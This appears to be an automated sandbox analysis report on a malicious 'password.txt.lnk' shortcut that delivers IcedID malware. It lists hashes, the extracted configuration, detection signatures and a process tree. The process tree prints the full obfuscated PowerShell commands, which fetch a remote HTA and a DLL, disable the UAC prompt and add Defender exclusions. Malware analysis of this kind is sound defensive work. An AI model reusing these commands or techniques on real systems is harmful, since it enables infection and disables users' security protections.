Analysis
- max time kernel: 150s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-06-2022 16:05

Static task: static1
Behavioral task: behavioral1
- Sample: password.txt.lnk
- Resource: win7-20220414-en
General
- Target: password.txt.lnk
- Size: 1KB
- MD5: ee5dc8a66298685a6f6790e32e1a006b
- SHA1: 8bd4a8e15b8c097283b67dd8201ed41e01cbe794
- SHA256: 65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
- SHA512: 8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
Malware Config
Extracted: https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Extracted: icedid, 3289900935, ilzenhwery.com
Signatures
-
UAC bypass
Processes (description, ioc, process):
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (powershell.exe)
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 6 IoCs
Processes (flow, pid, process):
- flow 6, pid 2688, mshta.exe
- flow 7, pid 2688, mshta.exe
- flow 9, pid 2688, mshta.exe
- flow 11, pid 2688, mshta.exe
- flow 12, pid 328, powershell.exe
- flow 15, pid 2184, rundll32.exe
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
- Key value queried: \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation (cmd.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation (mshta.exe)
-
Loads dropped DLL 1 IoCs
Processes (pid, process):
- pid 2184, rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes (pid, process):
- pid 1164, powershell.exe
- pid 1164, powershell.exe
- pid 328, powershell.exe
- pid 328, powershell.exe
- pid 2184, rundll32.exe
- pid 2184, rundll32.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description, pid, process):
- Token: SeDebugPrivilege, pid 1164, powershell.exe
- Token: SeDebugPrivilege, pid 328, powershell.exe
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes (description, pid, process, target process):
- PID 2300 wrote to memory of 1164: cmd.exe -> powershell.exe
- PID 2300 wrote to memory of 1164: cmd.exe -> powershell.exe
- PID 1164 wrote to memory of 2688: powershell.exe -> mshta.exe
- PID 1164 wrote to memory of 2688: powershell.exe -> mshta.exe
- PID 2688 wrote to memory of 328: mshta.exe -> powershell.exe
- PID 2688 wrote to memory of 328: mshta.exe -> powershell.exe
- PID 328 wrote to memory of 2184: powershell.exe -> rundll32.exe
- PID 328 wrote to memory of 2184: powershell.exe -> rundll32.exe
Processes
-
[depth 1] C:\Windows\system32\cmd.exe
Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\system32\mshta.exe
Command line: "C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;"
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\system32\rundll32.exe
Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: e1fb26de120faadab3c093b78644964f
SHA1: bb587dd3b1ad8384b6d612bc4bb806f41562982f
SHA256: e1ce351162cae7e8671f980192da54b8440d309985687d8eef56fec0b3180a85
SHA512: 6e4d18e9506e72f90aea0c93d190b9817566bbbfa2409c1ae6ca98c2b81f8a2bd4204270ce951444d49dfc85c9f1b913952afe6b8fceea918dd97006cf322518
-
C:\Users\Admin\AppData\Roaming\test.dll
Filesize: 858KB
MD5: f0b052dad1a3605cd3e6d044cd315388
SHA1: fe3d8f50b494f400bd47842d580343f38be6a04b
SHA256: 4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512: c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
memory/328-135-0x0000000000000000-mapping.dmp
-
memory/328-138-0x00007FF83E5B0000-0x00007FF83F071000-memory.dmp
Filesize: 10.8MB
-
memory/328-142-0x00007FF83E5B0000-0x00007FF83F071000-memory.dmp
Filesize: 10.8MB
-
memory/1164-134-0x00007FF83F280000-0x00007FF83FD41000-memory.dmp
Filesize: 10.8MB
-
memory/1164-131-0x00000251D9940000-0x00000251D9962000-memory.dmp
Filesize: 136KB
-
memory/1164-130-0x0000000000000000-mapping.dmp
-
memory/2184-139-0x0000000000000000-mapping.dmp
-
memory/2184-143-0x0000000180000000-0x0000000180009000-memory.dmp
Filesize: 36KB
-
memory/2688-132-0x0000000000000000-mapping.dmp